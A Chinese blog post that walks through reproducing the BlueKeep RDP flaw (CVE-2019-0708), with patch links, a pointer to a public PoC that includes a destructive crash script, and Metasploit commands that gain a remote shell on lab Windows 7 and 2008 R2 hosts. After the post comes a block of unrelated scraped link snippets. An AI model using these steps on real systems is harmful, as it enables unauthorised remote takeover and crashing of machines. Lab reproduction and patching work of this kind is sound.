JJJoeee
JJJoeee

CVE-2019-0708远程桌面漏洞验证和利用

漏洞影响范围:

Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows XP SP3 x86
Windows XP Professional x64 Edition SP2
Windows XP Embedded SP3 x86
Windows Server 2003 SP2 x86
Windows Server 2003 x64 Edition SP2

微软补丁下载(不包括XP和2003):

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

Windows Server 2003 漏洞补丁系列下载地址

Windows Server 2003 32位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe
Windows Server 2003 64位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe

Windows XP 漏洞补丁系列下载地址

Windows XP 32位系统:
http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe
Windows XP 64位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe

国内漏洞编号(CNVD-2019-14264、CNNVD-201905-434)

使用python脚本复现

1.准备一台安装了python3的机器(win或linux都可以)

2.下载https://github.com/n1xbyte/CVE-2019-0708的相关文件
poc.py(验证漏洞是否存在)
crashpoc.sh(进行破坏性攻击)
python xx.py ipAddress 32or64(目标win是32位还是64位)

3.安装impacket、Structure扩展包
pip3 install impacket
pip3 install Structure

4.安装openssl

5.给以上两个python文件赋予权限并执行

使用metasploit复现

下载metasploit相关文件:
下载地址:https://github.com/rapid7/metasploit-framework
下载RDP依赖:metasploit-framework/lib/msf/core/exploit/rdp.rb
下载RDP扫描模块:metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
下载cve-0708扫描模块:metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
下载cve-0708利用模块:metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

攻击windows 7 SP1 复现CVE-2019-0708

msfconsole
msf5> reload_all
msf5> search cve_2019_0708_bluekeep_rce
msf5> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.7
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > shell
如果成功的话就会进入rhost的ms-dos,可以输入whoami、net user查看相关信息

攻击windows 2008 R2 SP1 复现CVE-2019-0708

需要修改注册表[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdp-tcp\fDisableCam]值修改为0(系统默认为1)
在MSF下执行如下命令:
msf5 > search cve_2019_0708_bluekeep_rce
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.10
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

你可能感兴趣的:(CVE-2019-0708远程桌面漏洞验证和利用)

  • 婚恋交友系统定制开发多少钱费用|哪家好些|专业正规 红匣子实力推荐
    婚恋交友系统是一种针对单身人士的社交平台,它提供了一种快速、便捷的方式来寻找有共同兴趣爱好和价值观的伴侣。近年来,随着互联网技术的发展,婚恋交友系统得到了广泛的应用,并逐渐出现了一些定制化的开发方案。那么,婚恋交友系统定制开发多少钱呢?本文将从以下几个方面进行探讨。开发-联系电话:13642679953(微信同号)一、开发成本开发成本是婚恋交友系统定制开发多少钱的重要因素之一。具体而言,开发成本包
  • 自信游戏规则 自我成长每一天
    书名《自信的陷阱》作者(澳)路斯-哈里斯分类心理自助本书目录:(一)热身(二)双刃剑(三)你的动力是什么(四)驯服你的恐惧(五)进行自信游戏自信不是一件一劳永逸的事,而是一个挑战自我的长期过程。自信不是一个最终结果,而是一个不断坚守自我价值的过程。要么大胆尝试,要么一无所获。你的人生很有可能因为“缺乏自信”“害怕失败”“表现焦虑”和“自我怀疑”而失去很多。如果你更自信,人生会有何不同?自信的缺失并
  • 时间管理,永远要管理这三个时间 | 时间管理 Kong大叔
    努力当下,活在过去和未来。时间管理,永远要管理三个时间:过去,当下,未来。我们以改变为核心手段,以发展的连续性和非连续性为指导原则,以过去、现在、未来为划分去管理时间,持续迭代,最终实现人参更大的可能。弱者更多活在过去。年轻人喜欢聊未来,中年人喜欢聊现在,老年人喜欢聊过去。活在过去,更好理解的说法是:在过去上活。1.你如何看待过去?过去不决定论,与过去决定论。2.你如何使用过去?有人当借口,有人当
  • redis之源码包安装 瀟湘夜雨-秋雨梧桐 redis数据库缓存
    文章目录前言一、安装步骤1.源码包官方下载2.解压源码包3.安装redis4.配置环境变量5.redis服务启动前言Redis(RemoteDictionaryServer)是一个开源的高性能内存数据存储系统。它以键值对的形式存储数据,并支持多种数据结构,如字符串、哈希表、列表、集合和有序集合等。Redis具有低延迟、高吞吐量的特点,适用于对响应时间要求较高的场景。它支持数据持久化,通过快照和日志
  • 2019年10月20日 沐浴阳光_ee71
    今天周日,原本想领着孩子睡个懒觉,结果俩孩子一个比一个起得早中午,闺女和奶奶去看姥姥娘去了,小马和爷爷买了一盒水晶泥,也不知道这家伙怎么想的,用水晶泥做了一个项链,带到了自己的脖子上,我在卧室只听见小马爷爷的一声喊,小马已经藏起来了,水晶泥弄的秋衣上都是,揭都揭不下来,也不知道是该夸他有创意还是该批评他…晚上,我们一家四口一起重温了一遍电影《寻梦环游记》,感受了一家人在一起的美好!是的,只要是一家
  • Deep learning for Computer Vision with Python(1)从零开始入门计算机视觉 Hazelyu27 计算机视觉大数据计算机视觉深度学习
    本书的内容分成三个部分:1.初始阶段初始阶段学习:机器学习、神经网络、卷积神经网络、建立数据集。2.实践阶段实践阶段:深入学习深度学习,理解先进技术,发现最佳实践方式。3.图像网络阶段完成计算机视觉领域的经验积累。使用大规模数据集和真实图片案例作为数据集,包括年龄和性别预测,交通工具模型识别。本书提供了对应网站:http://pyimg.co/fnkxk本文介绍前两章内容:基本介绍和深度学习简介。
  • Java中的分布式计算:如何在多节点环境中实现高效计算 省赚客app开发者 java开发语言
    Java中的分布式计算:如何在多节点环境中实现高效计算大家好,我是微赚淘客系统3.0的小编,是个冬天不穿秋裤,天冷也要风度的程序猿!在现代计算中,分布式计算已成为处理大量数据和复杂计算任务的标准解决方案。通过将计算任务分散到多个节点上,可以显著提升计算性能和系统的可扩展性。本文将探讨如何在Java环境中实现高效的分布式计算,涵盖从基本概念到具体的技术实现和最佳实践。一、分布式计算基础分布式计算指的
  • 实训day4 yolo1代码运行 Hazelyu27
    yolo1代码运行今天主要是在pycharm上运行pytorch的yolo1训练和测试代码。主要遇到的问题:1.训练文件路径的修改,开始没有找到tmp_file文件,就在该文件夹下创建了这个txt文件,但是发现:ifisinstance(list_file,list):#Catmultiplelistfilestogether.#Thisisespeciallyusefulforvoc07/voc
  • 2019-04-21 山荆子_
    姐姐扣出了新天际,要做可乐鸡翅,葱和蒜都是和朋友拿的,知道朋友家有可乐,连可乐都没买。还特别理直气壮的说:她的世界里只有借没有还。姐姐毕业没有找工作,每天在家像个家庭主妇一样,一边生活,一边慢慢的等工作机会。陪着奶奶爷爷,某个瞬间我觉得这样子也不错。老人都是见一面少一面,就陪在他们身旁,这样的生活简单而珍贵。无论怎样的选择,只要自己认为是对的并且有承担的勇气,那就坚持吧。对他人的评价少一点,因为我
  • 【鼠鼠学AI代码合集#5】线性代数 鼠鼠龙年发大财 鼠鼠学AI系列代码合集人工智能线性代数机器学习
    在前面的例子中,我们已经讨论了标量的概念,并展示了如何使用代码对标量进行基本的算术运算。接下来,我将进一步说明该过程,并解释每一步的实现。标量(Scalar)的基本操作标量是只有一个元素的数值。它可以是整数、浮点数等。通过下面的Python代码,我们可以很容易地进行标量的加法、乘法、除法和指数运算。代码实现:importtorch#定义两个标量x=torch.tensor(3.0)#标量x,值为3
  • flink独立集群部署 嘎子吱吱吱吱 flinkhadooplinux
    #flink独立集群部署说明安装环境三台服务器47.106.23.1(master)47.112.173.2(worker1)47.115.162.3(worker1)提前装好jdk和ssh,以下操作最好不要用root账号提前下载好flink的包并解压设置三台服务器之间ssh免密登录生成本机秘钥以47.106.23.1为例(其他两台参考本服务器)#生成本机秘钥cd;ssh-keygen-trsa-
  • 4.2三月初十 梅心梅肺_c708
    数算我的恩福第90天:平静从我开始~哈~竟然在不知不觉中就到了第90天呢,值得庆祝的时刻,庆祝生命来到了很高的觉知觉察层面。因为让自己的心和人都来到一个完全抽离的状态,竟然可以达到无条件的喜悦和挂碍,好惊喜!下午和小宝贝竟然睡到了三点多,看到她睡的特别香,不忍心打扰。自己出去找了个小花园僻静的地方做呼吸法。回来的时候给孩子们买了草莓,去几个超市去问有没有糖炒栗子,结果都没有。看来,小宝贝吃的东西太
  • 写给小白——Android动画之位移动画(移动动画) justCode_
    前面讲了,透明动画和缩放动画,今天单独讲讲位移动画。因为位移动画,真的是相对而言,变化最多,也最难(当然,也不难,会就不难)首先,我喜欢先讲方法和结果。然后,再讲原理。移动动画的代码,就这么多,这里的代码,几乎是位移动画的全部了。这里,我先不讲每个参数是什么。我准备在文末解释。我红框选中的地方,是我今天讲的重点。首先,我们讲一个东西,我今天讲的是平面位移(也叫二维位移)。当然,有三维(俗称3D)的
  • 大模型LLM面试常见算法题-包括Attention和Transformer常见面试题 剑圣土豆 算法面试大模型学习自然语言处理transformer算法nlp自然语言处理面试深度学习人工智能
    大模型:位置编码有哪些?介绍LoRA与QLoRARAG和微调的区别是什么?哪些因素会导致LLM的偏见?什么是思维链(CoT)提示?Tokenizer的实现方法及原理解释一下大模型的涌现能力?解释langchainAgent的概念langchain有哪些替代方案?RLHF完整训练过程是什么?为什么RLHF的效果这么好?RLHF使用的训练数据是什么样的?RAG和微调的区别是什么?有了解过什么是稀疏微调
  • 用python的NiceGUI库 实现webApp___官网文档熟悉 错误重复学习记录 webapp
    官网文档文本元素ui.label、、ui.markdown和ui.restructured_text等元素ui.html可用于显示文本和其他内容。TextElementsLabel、Link、ChatMessage、GenericElement、MarkdownElement、ReStructuredText、MermaidDiagrams、HTMLElement控制NiceGUI提供了多种用于用
  • linuxcnc-cia402 README 错误重复学习记录 笔记
    hal-cia402CiA402器件的HAL接口,该组件用作硬件与Hal模块(如Ethercat、CAN总线或其他)之间的粘合层。它将原始IO数据从PDO转换为常见的linuxcncHal引脚结构,并具有内置逻辑用于CiA402状态控制、反馈处理、外部归位和内置缩放功能。它提供两个函数:read_all和write_all。相应任务中的整合概念应如下:硬件输入-->--CiA402_read-->
  • python比较好用的ide_Windows下有哪些比较好用的Python IDE? 巴黎的左岸风 python比较好用的ide
    https://www.toutiao.com/a6664531127702651150/这里介绍3个不错的Windows平台下的PythonIDE,分别是VSCode、VS2017和PyCharm,这3个软件使用起来都非常不错,而且都有免费版本,下面我简单介绍一下这3个软件,主要内容如下:VSCode这是一个免费、开源、跨平台的代码编辑器,微软的产品,严格意义上讲,这不是一个PythonIDE环
  • PPT小白,也可以一分钟搞定PPT封面! 菩提一叶树
    几乎职场上的每个人都会用到PPT,但大多数人只掌握了一些很基础的操作,很难做出一个像样的PPT。做PTT首先需要做PPT封面,下面就分享一些简洁通用PPT封面的排版思路,相信即使是PPT小白看完后,也能在一分钟内做出一个靠谱的PPT封面。一、简单的形状和线条的运用线条的运用在时间很紧,PPT要求不是太高的时候,白色的背景和简单的两条线条组合成简介的封面,虽然略显单调,但依旧可以应急。形状和线条的组
  • 文案| 治愈系文案. 星星坠入梦境
    1.所有的热情都会在等待和失望中消失2.最近月亮没有营业晚安由我来说吧3.怀疑宇宙悄悄拦截了有人爱我的信号4.失败不过是上帝在考验你是否真的热爱5.在往后的日子里光芒万丈熠熠生辉6.热爱可抵岁月漫长温柔可挡艰难时光7.还有星月可以寄望还有宇宙浪漫不止8.那就一起头也不回的向着光亮走下去吧9.月亮在慢慢变圆事情也会慢慢变好对吧10.愿一切为之努力的事情都有浪漫的结果11.善良勇敢优秀绝不妥协祝你也祝
  • 多彩夕阳——老年人的膳食要点 伴乐生
    夕阳也是绚丽美目的,漫天的彩霞极赋韵味。老年人也有着独特的生活方式,他们充满了睿智、充满了历练,犹如夕阳的红包涵万千。老年人各器官随年龄的增加而衰退,免疫力下降,对外界和身体机能改变的适应能力减低,体力也随之下降。老年人器官功能可出现不同程度的衰退表现:1、牙齿松动和缺损、咀嚼和消化吸收能力下降。2、视觉、听觉、味觉和触觉等感官反应会出现迟钝。3、身体的肌肉开始萎缩、瘦体组织量减少、脂肪量增加。骨
  • 吴春燕|将儿童读写进行到底 燕然然
    经过一段时间的学习,今天获得了担当者行动橡果书院“儿童阅读指导师初级认证证书”,其课程内容对应的是书籍《儿童读写三十讲》的精华内容。经过书籍精华的淬炼、梳理与打磨,课程分三十讲细致地谈及读写的方方面面。听完课对书籍所表达的理念更加理解了。魏智渊的《儿童读写三十讲》真是一本充满智慧的宝藏书籍。序言讲的是核心素养背景下的儿童阅读,在最后梳理了人生不同阅读的重点和状态,这个值得我们关注。小学阅读的关键,
  • 《道德经》第70章的疑惑(一) 旭日老师
    《道德经》这一本书确实博大精深,我在20多年前读书的时候就接触了《道德经》,后来常常反复阅读,常读常新,特别是看到南怀瑾老师的《老子他说》后感受更深,自己再结合儒家经典和佛家经典以及马克思主义辩证唯物主义哲学等哲学思想之后,我对有些章节理解就更深刻了,有时有一种豁然开朗的感觉,有时又有一些疑惑,第70章就是其中产生疑惑最多的章节之一。我们先看第七十章原文:吾言甚易知,甚易行。天下莫能知,莫能行。言
  • 《道德经》第70章的疑惑(一) 旭日老师
    《道德经》这一本书确实博大精深,我在20多年前读书的时候就接触了《道德经》,后来常常反复阅读,常读常新,特别是看到南怀瑾老师的《老子他说》后感受更深,自己再结合儒家经典和佛家经典以及马克思主义辩证唯物主义哲学等哲学思想之后,我对有些章节理解就更深刻了,有时有一种豁然开朗的感觉,有时又有一些疑惑,第70章就是其中产生疑惑最多的章节之一。我们先看第七十章原文:吾言甚易知,甚易行。天下莫能知,莫能行。言
  • VMOS PRO 安卓手机一直卡死、闪退、死机、虚拟机操作界面没反应等问题 return_rebound linux其他
    我在启动VMOSpro多次后,每次运行一下就卡死、虚拟机操作界面没有反应后,一直在网上搜索方法解决问题,发现只用下载VMOS助手就可以解决下面讲解详细步骤:1.下载vmos助手,安装2.进入软件,点击激活3.按步骤:a、手机连接wifi;b、打开开发者选项(在手机版本信息里,频繁点击版本号打开开发者选项);c、打开开发者选项中的”允许在‘设置’上重叠显示“和”无线调试开关“,一定要打开;d、点击无
  • 标题:深入理解 JavaScript 中的定时器 小刘| javascript前端开发语言
    目录一、定时器的基本概念1.setInterval2.setTimeout二、代码示例分析一、定时器的基本概念在JavaScript中,定时器是一种用于在特定时间间隔后执行代码或者重复执行代码的机制。主要包含两种类型的定时器:setInterval和setTimeout。1.setIntervalsetInterval()是一个周期函数,它会在指定的时间间隔后,重复执行指定的函数。例如:vari=
  • 一个真正有能力的人,必须具备七项感知和技能。 東東随笔
    一个真正有能力的人,必须具备七项感知和技能。①对个人能力的感知——“我能行”。②对自己在重要关系中的价值的感知力——“我的贡献有价值,大家确实需要我”。③对自己在生活中的力量或影响的感知力——“我能够影响发生在自己身上的事情”。④内省能力,能理解个人的情绪,并能利用这种理解做到自律以及自我控制。⑤人际沟通能力,善于和他人合作,并在沟通、协作、协商、分享、共情和倾听的基础上建立友谊。⑥整体把握能力,
  • 嘉文长存1(转载):一封家书惊动教育部,写的真好! 自强之声
    一封家书惊动教育部,写的真好!聚缘在路上2018-06-24嘉文转载1(长存):一位大学教授,给自己刚考入大学的女儿,写了一封信!父亲在信里对当时刚考上大学的女儿提了9点建议,涵盖了道德、专业、知识、恋爱方方面面。这封信不仅打动了千万父母,甚至还惊动了教育部,《人民日报》也转发荐读。甚至有网友建议:把这篇文章作为高中语文和大学语文的第一课。他们的故事:这位父亲叫吴辉,是江西财经大学人文学院新闻传播
  • 如何自主创业赚钱?适合新手创业赚钱的项目有哪些? 高省APP大九
    有人说,现在还处于经济危机时代,经济形势并不好,甚至处于资本寒冬,因此不建议创业;也有人说,创业也要分行业,更要看个人能力,事实上任何年代,创业都有相应地风险和压力,因此没有什么能阻挡创业的步伐。新人创业在创业项目的选择上更是一脸茫然不知所措,下面就把几个适合小本创业的项目推荐给大家,想要创业的朋友可以了解一下。高省APP佣金更高,模式更好,终端用户不流失。【高省】是一个自用省钱佣金高,分享推广赚
  • 喜欢读书的人,即使独处也不会觉得孤独 喜欢听音乐
    在这个世上,除了寒冷与饥饿,世上最难熬的恐怕就是孤独了。怎么消除孤独?读书是免于焦虑和孤独最好的捷径。爱读书的人,与书相伴,即便独处,也不会孤独。把闲暇时间用来读书,在书中遇见广阔而瑰丽的世界,才不会感到匮乏和空虚。用读书填满独处的时间,即使一个人生活也不会感到孤独。读书是化解孤独最好的办法,因为读书可以让自己活在一个深情的精神世界。
  • 每日一省D29(2023-1-27) 芒果逗逗
    1、今天早上依然是睡到自然醒,感谢假期让我的身体得到修复,全身不知疲倦,今天第一次坐在床上静静的做早安冥想,一个多月未练瑜伽,假期手机也使用过度,坐着时感觉全身都伸不直,颈椎和腰椎都硬邦邦的,慢慢的调整自己的呼吸,时不时的晃动下身体,大脑跟着音频轻轻的默读成长意图,十分钟左右竟然坚持下让,想想以前是特别抗拒静坐的,感谢大脑中的潜意识为了让自己坚持的鼓励。2、八点钟依旧是喊孩子起床准备去上课,女儿清
  • springmvc 下 freemarker页面枚举的遍历输出 杨白白 enumfreemarker
    spring mvc freemarker 中遍历枚举 1枚举类型有一个本地方法叫values(),这个方法可以直接返回枚举数组。所以可以利用这个遍历。 enum public enum BooleanEnum { TRUE(Boolean.TRUE, "是"), FALSE(Boolean.FALSE, "否");
  • 实习简要总结 byalias 工作
    来白虹不知不觉中已经一个多月了,因为项目还在需求分析及项目架构阶段,自己在这段 时间都是在学习相关技术知识,现在对这段时间的工作及学习情况做一个总结: (1)工作技能方面 大体分为两个阶段,Java Web 基础阶段和Java EE阶段 1)Java Web阶段 在这个阶段,自己主要着重学习了 JSP, Servlet, JDBC, MySQL,这些知识的核心点都过 了一遍,也
  • Quartz——DateIntervalTrigger触发器 eksliang quartz
    转载请出自出处:http://eksliang.iteye.com/blog/2208559 一.概述 simpleTrigger 内部实现机制是通过计算间隔时间来计算下次的执行时间,这就导致他有不适合调度的定时任务。例如我们想每天的 1:00AM 执行任务,如果使用 SimpleTrigger,间隔时间就是一天。注意这里就会有一个问题,即当有 misfired 的任务并且恢复执行时,该执行时间
  • Unix快捷键 18289753290 unixUnix;快捷键;
    复制,删除,粘贴: dd:删除光标所在的行                             &nbs
  • 获取Android设备屏幕的相关参数 酷的飞上天空 android
    包含屏幕的分辨率  以及 屏幕宽度的最大dp 高度最大dp   TextView text = (TextView)findViewById(R.id.text); DisplayMetrics dm = new DisplayMetrics(); text.append("getResources().ge
  • 要做物联网?先保护好你的数据 蓝儿唯美 数据
    根据Beecham Research的说法,那些在行业中希望利用物联网的关键领域需要提供更好的安全性。 在Beecham的物联网安全威胁图谱上,展示了那些可能产生内外部攻击并且需要通过快速发展的物联网行业加以解决的关键领域。 Beecham Research的技术主管Jon Howes说:“之所以我们目前还没有看到与物联网相关的严重安全事件,是因为目前还没有在大型客户和企业应用中进行部署,也就
  • Java取模(求余)运算 随便小屋 java
            整数之间的取模求余运算很好求,但几乎没有遇到过对负数进行取模求余,直接看下面代码: /** * * @author Logic * */ public class Test { public static void main(String[] args) { // TODO A
  • SQL注入介绍 aijuans sql注入
    二、SQL注入范例 这里我们根据用户登录页面 <form action="" > 用户名:<input type="text" name="username"><br/> 密 码:<input type="password" name="passwor
  • 优雅代码风格 aoyouzi 代码
    总结了几点关于优雅代码风格的描述: 代码简单:不隐藏设计者的意图,抽象干净利落,控制语句直截了当。 接口清晰:类型接口表现力直白,字面表达含义,API 相互呼应以增强可测试性。 依赖项少:依赖关系越少越好,依赖少证明内聚程度高,低耦合利于自动测试,便于重构。 没有重复:重复代码意味着某些概念或想法没有在代码中良好的体现,及时重构消除重复。 战术分层:代码分层清晰,隔离明确,
  • 布尔数组 百合不是茶 java布尔数组
      androi中提到了布尔数组;   布尔数组默认的是false,  并且只会打印false或者是true   布尔数组的例子;  根据字符数组创建布尔数组 char[] c = {'p','u','b','l','i','c'}; //根据字符数组的长度创建布尔数组的个数 boolean[] b = new bool
  • web.xml之welcome-file-list、error-page bijian1013 javaweb.xmlservleterror-page
    welcome-file-list 1.定义: <welcome-file-list> <welcome-file>login.jsp</welcome> </welcome-file-list>  2.作用:用来指定WEB应用首页名称。   error-page1.定义: <error-page&g
  • richfaces 4 fileUpload组件删除上传的文件 sunjing clearRichfaces 4fileupload
     页面代码               <h:form id="fileForm">            <rich:
  • 技术文章备忘 bit1129 技术文章
    Zookeeper http://wenku.baidu.com/view/bab171ffaef8941ea76e05b8.html http://wenku.baidu.com/link?url=8thAIwFTnPh2KL2b0p1V7XSgmF9ZEFgw4V_MkIpA9j8BX2rDQMPgK5l3wcs9oBTxeekOnm5P3BK8c6K2DWynq9nfUCkRlTt9uV
  • org.hibernate.hql.ast.QuerySyntaxException: unexpected token: on near line 1解决方案 白糖_ Hibernate
    文章摘自:http://blog.csdn.net/yangwawa19870921/article/details/7553181   在编写HQL时,可能会出现这种代码: select a.name,b.age from TableA a left join TableB b on a.id=b.id  如果这是HQL,那么这段代码就是错误的,因为HQL不支持
  • sqlserver按照字段内容进行排序 bozch 按照内容排序
    在做项目的时候,遇到了这样的一个需求:           从数据库中取出的数据集,首先要将某个数据或者多个数据按照地段内容放到前面显示,例如:从学生表中取出姓李的放到数据集的前面;          select * fro
  • 编程珠玑-第一章-位图排序 bylijinnan java编程珠玑
    import java.io.BufferedWriter; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.io.Writer; import java.util.Random; public class BitMapSearch {
  • Java关于==和equals chenbowen00 java
    关于==和equals概念其实很简单,一个是比较内存地址是否相同,一个比较的是值内容是否相同。虽然理解上不难,但是有时存在一些理解误区,如下情况: 1、 String a = "aaa"; a=="aaa"; ==> true 2、 new String("aaa")==new String("aaa
  • [IT与资本]软件行业需对外界投资热情保持警惕 comsci it
          我还是那个看法,软件行业需要增强内生动力,尽量依靠自有资金和营业收入来进行经营,避免在资本市场上经受各种不同类型的风险,为企业自主研发核心技术和产品提供稳定,温和的外部环境...       如果我们在自己尚未掌握核心技术之前,企图依靠上市来筹集资金,然后使劲往某个领域砸钱,然
  • oracle 数据块结构 daizj oracle数据块块结构行目录
    oracle 数据块是数据库存储的最小单位,一般为操作系统块的N倍。其结构为: 块头--〉空行--〉数据,其实际为纵行结构。 块的标准大小由初始化参数DB_BLOCK_SIZE指定。具有标准大小的块称为标准块(Standard Block)。块的大小和标准块的大小不同的块叫非标准块(Nonstandard Block)。同一数据库中,Oracle9i及以上版本支持同一数据库中同时使用标
  • github上一些觉得对自己工作有用的项目收集 dengkane github
    github上一些觉得对自己工作有用的项目收集 技能类 markdown语法中文说明 回到顶部 全文检索 elasticsearch bigdesk elasticsearch管理插件 回到顶部 nosql mapdb 支持亿级别map, list, 支持事务. 可考虑做为缓存使用 C
  • 初二上学期难记单词二 dcj3sjt126com englishword
    dangerous 危险的 panda 熊猫 lion 狮子 elephant 象 monkey 猴子 tiger 老虎 deer 鹿 snake 蛇 rabbit 兔子 duck 鸭 horse 马 forest 森林 fall 跌倒;落下 climb 爬;攀登 finish 完成;结束 cinema 电影院;电影 seafood 海鲜;海产食品 bank 银行
  • 8、mysql外键(FOREIGN KEY)的简单使用 dcj3sjt126com mysql
    一、基本概念 1、MySQL中“键”和“索引”的定义相同,所以外键和主键一样也是索引的一种。不同的是MySQL会自动为所有表的主键进行索引,但是外键字段必须由用户进行明确的索引。用于外键关系的字段必须在所有的参照表中进行明确地索引,InnoDB不能自动地创建索引。 2、外键可以是一对一的,一个表的记录只能与另一个表的一条记录连接,或者是一对多的,一个表的记录与另一个表的多条记录连接。 3、如
  • java循环标签 Foreach shuizhaosi888 标签java循环foreach
    1. 简单的for循环 public static void main(String[] args) { for (int i = 1, y = i + 10; i < 5 && y < 12; i++, y = i * 2) { System.err.println("i=" + i + " y="
  • Spring Security(05)——异常信息本地化 234390216 exceptionSpring Security异常信息本地化
    异常信息本地化          Spring Security支持将展现给终端用户看的异常信息本地化,这些信息包括认证失败、访问被拒绝等。而对于展现给开发者看的异常信息和日志信息(如配置错误)则是不能够进行本地化的,它们是以英文硬编码在Spring Security的代码中的。在Spring-Security-core-x
  • DUBBO架构服务端告警Failed to send message Response javamingtingzhao 架构DUBBO
     废话不多说,警告日志如下,不知道有哪位遇到过,此异常在服务端抛出(服务器启动第一次运行会有这个警告),后续运行没问题,找了好久真心不知道哪里错了。    WARN 2015-07-18 22:31:15,272 com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(84)
  • JS中Date对象中几个用法 leeqq JavaScriptDate最后一天
    近来工作中遇到这样的两个需求 1. 给个Date对象,找出该时间所在月的第一天和最后一天 2. 给个Date对象,找出该时间所在周的第一天和最后一天   需求1中的找月第一天很简单,我记得api中有setDate方法可以使用 使用setDate方法前,先看看getDate var date = new Date(); console.log(date); // Sat J
  • MFC中使用ado技术操作数据库 你不认识的休道人 sqlmfc
    1.在stdafx.h中导入ado动态链接库 #import"C:\Program Files\Common Files\System\ado\msado15.dll" no_namespace rename("EOF","end")2.在CTestApp文件的InitInstance()函数中domodal之前写::CoIniti
  • Android Studio加速 rensanning android studio
    Android Studio慢、吃内存!启动时后会立即通过Gradle来sync & build工程。 (1)设置Android Studio a) 禁用插件 File -> Settings...  Plugins 去掉一些没有用的插件。 比如:Git Integration、GitHub、Google Cloud Testing、Google Cloud
  • 各数据库的批量Update操作 tomcat_oracle javaoraclesqlmysqlsqlite
    MyBatis的update元素的用法与insert元素基本相同,因此本篇不打算重复了。本篇仅记录批量update操作的 sql语句,懂得SQL语句,那么MyBatis部分的操作就简单了。   注意:下列批量更新语句都是作为一个事务整体执行,要不全部成功,要不全部回滚。 MSSQL的SQL语句  WITH R AS(   SELECT 'John' as name, 18 as
  • html禁止清除input文本输入缓存 xp9802 input
    多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off"; eg: <input type="text" autocomplete="off" name
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他